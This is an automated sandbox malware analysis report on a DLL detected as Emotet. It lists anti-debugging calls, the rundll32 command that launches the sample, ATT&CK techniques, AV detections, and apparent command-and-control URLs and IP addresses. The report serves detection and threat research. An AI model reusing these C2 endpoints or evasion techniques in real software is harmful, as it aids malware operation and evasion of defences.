Source: rundll32.exe, 00000010.00000002.869693856.0000000003173000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWX
Source: svchost.exe, 00000011.00000002.862867478.000001B689861000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000006.00000002.868336172.000001CB6EC02000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: rundll32.exe, 00000010.00000002.869693856.0000000003173000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.862853839.000001B68984B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.752514434.000001D76547C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000011.00000002.862506728.000001B684029000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`c
Source: svchost.exe, 00000006.00000002.868436450.000001CB6EC28000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F19ED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6F19ED41

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F198508 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

1_2_6F198508

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F186620 rdtscp

1_2_6F186620

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CADE10 mov eax, dword ptr fs:[00000030h]	1_2_00CADE10
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F186620 mov ecx, dword ptr fs:[00000030h]	1_2_6F186620
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F186510 mov eax, dword ptr fs:[00000030h]	1_2_6F186510
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F19849D mov esi, dword ptr fs:[00000030h]	1_2_6F19849D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F188A50 mov eax, dword ptr fs:[00000030h]	1_2_6F188A50
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F1A69AA mov eax, dword ptr fs:[00000030h]	1_2_6F1A69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0313DE10 mov eax, dword ptr fs:[00000030h]	3_2_0313DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F186620 mov ecx, dword ptr fs:[00000030h]	3_2_6F186620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F186510 mov eax, dword ptr fs:[00000030h]	3_2_6F186510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F19849D mov esi, dword ptr fs:[00000030h]	3_2_6F19849D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F188A50 mov eax, dword ptr fs:[00000030h]	3_2_6F188A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F1A69AA mov eax, dword ptr fs:[00000030h]	3_2_6F1A69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0332DE10 mov eax, dword ptr fs:[00000030h]	5_2_0332DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0DE10 mov eax, dword ptr fs:[00000030h]	9_2_00B0DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EADE10 mov eax, dword ptr fs:[00000030h]	16_2_00EADE10

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F19ED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6F19ED41
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F195239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6F195239
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F195ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6F195ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F19ED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6F19ED41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F195239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6F195239
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F195ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6F195ABD

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1

Jump to behavior

Source: rundll32.exe, 00000010.00000002.869934032.0000000003580000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000010.00000002.869934032.0000000003580000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000010.00000002.869934032.0000000003580000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000010.00000002.869934032.0000000003580000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_6F1B5F10
Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_6F1B57AC
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6F1ADD93
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6F1B5DE7
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6F1B5B0A
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_6F1B5B97
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6F1B5A24
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6F1B5A6F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6F1AE2F8
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6F1B597B
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6F1B6017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6F1B5F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_6F1B57AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6F1ADD93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6F1B5DE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6F1B5B0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_6F1B5B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6F1B5A24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6F1B5A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6F1AE2F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6F1B597B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6F1B6017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6F1B60E4

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F195916 cpuid

1_2_6F195916

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F195C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_6F195C3C

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 9.2.rundll32.exe.b44230.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.b8b540.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.b8b540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.34c4df8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.34c4df8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.34343b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.b44230.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.3114f88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.34343b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2fb4358.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.3114f88.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2fb4358.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.459119053.000000000341A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.462364516.0000000002F9A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.406496894.00000000034AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.462832524.0000000000B7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.869632887.00000000030FA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.471606182.0000000000B2A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.458372363.00000000032B5000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Application Shimming1	Process Injection112	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Application Shimming1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery141	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Information Discovery144	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5YO8hZg21O.dll	21%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.2.rundll32.exe.e90000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
1.2.loaddll32.exe.c90000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.3310000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.af0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.32d0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.30d0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.3120000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://51.178.61.60/.Tw	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://51.178.61.60/	10%	Virustotal		Browse
https://51.178.61.60/	0%	Avira URL Cloud	safe
https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqIT	0%	Avira URL Cloud	safe
https://www.pango.co/privacy	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqITg3	0%	Avira URL Cloud	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqI	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqI	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://51.178.61.60/.Tw	rundll32.exe, 00000010.00000002.869671653.000000000314A000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://51.178.61.60/	rundll32.exe, 00000010.00000002.869671653.000000000314A000.00000004.00000020.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hotspotshield.com/terms/	svchost.exe, 0000001B.00000003.740353956.000001D766202000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.740249361.000001D765D98000.00000004.00000001.sdmp	false		high
https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqIT	rundll32.exe, 00000010.00000002.869632887.00000000030FA000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://www.pango.co/privacy	svchost.exe, 0000001B.00000003.740353956.000001D766202000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.740249361.000001D765D98000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000011.00000002.862795195.000001B689815000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.753661447.000001D765D00000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqITg3	rundll32.exe, 00000010.00000002.869693856.0000000003173000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://help.disneyplus.com.	svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.hotspotshield.com/	svchost.exe, 0000001B.00000003.740353956.000001D766202000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.740249361.000001D765D98000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	524860
Start date:	19.11.2021
Start time:	01:00:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	5YO8hZg21O (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@29/5@0/22
EGA Information:	Failed
HDC Information:	Successful, ratio: 12.8% (good quality ratio 11.5%) Quality average: 70.2% Quality standard deviation: 30.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 62 Number of non-executed functions: 258
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.54.110.249 Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, clientconfig.passport.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:02:53	API Interceptor	9x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
	nXOpgPAbKC.dll	Get hash	malicious	Browse
196.44.98.190	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
	nXOpgPAbKC.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	dUGnMYeP1C.dll	Get hash	malicious	Browse	66.42.57.149
	yFAXc9z51V.dll	Get hash	malicious	Browse	66.42.57.149
	9fC0as7YLE.dll	Get hash	malicious	Browse	66.42.57.149
	FIyE6huzxV.dll	Get hash	malicious	Browse	66.42.57.149
	V0gZWRXv8d.dll	Get hash	malicious	Browse	66.42.57.149
	t5EuQW2GUF.dll	Get hash	malicious	Browse	66.42.57.149
	uh1WyesPlh.dll	Get hash	malicious	Browse	66.42.57.149
	8rryPzJR1p.dll	Get hash	malicious	Browse	66.42.57.149
	a65FgjVus4.dll	Get hash	malicious	Browse	66.42.57.149
	bWjYh6H8wk.dll	Get hash	malicious	Browse	66.42.57.149
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	66.42.57.149
	eyPPiz3W6u.dll	Get hash	malicious	Browse	66.42.57.149
	HjYSwxqyUn.dll	Get hash	malicious	Browse	66.42.57.149
	f47YPsvRI3.dll	Get hash	malicious	Browse	66.42.57.149
	2n64VXT08V.dll	Get hash	malicious	Browse	66.42.57.149
	qUr4bXsweR.dll	Get hash	malicious	Browse	66.42.57.149
	52O6evfqQT.dll	Get hash	malicious	Browse	66.42.57.149
	ONEitXKvz6.dll	Get hash	malicious	Browse	66.42.57.149
	F2433DFBA69148A0C3A5A5951D360B6C3C045090DE06F.exe	Get hash	malicious	Browse	149.28.253.196
	jQ32XS2Lgf.exe	Get hash	malicious	Browse	216.128.137.31
EcobandGH	dUGnMYeP1C.dll	Get hash	malicious	Browse	196.44.98.190
	yFAXc9z51V.dll	Get hash	malicious	Browse	196.44.98.190
	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	196.44.98.190
	eyPPiz3W6u.dll	Get hash	malicious	Browse	196.44.98.190
	HjYSwxqyUn.dll	Get hash	malicious	Browse	196.44.98.190
	f47YPsvRI3.dll	Get hash	malicious	Browse	196.44.98.190
	2n64VXT08V.dll	Get hash	malicious	Browse	196.44.98.190
	qUr4bXsweR.dll	Get hash	malicious	Browse	196.44.98.190
	52O6evfqQT.dll	Get hash	malicious	Browse	196.44.98.190
	ONEitXKvz6.dll	Get hash	malicious	Browse	196.44.98.190
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse	196.44.98.190
	nXOpgPAbKC.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	dUGnMYeP1C.dll	Get hash	malicious	Browse	51.178.61.60
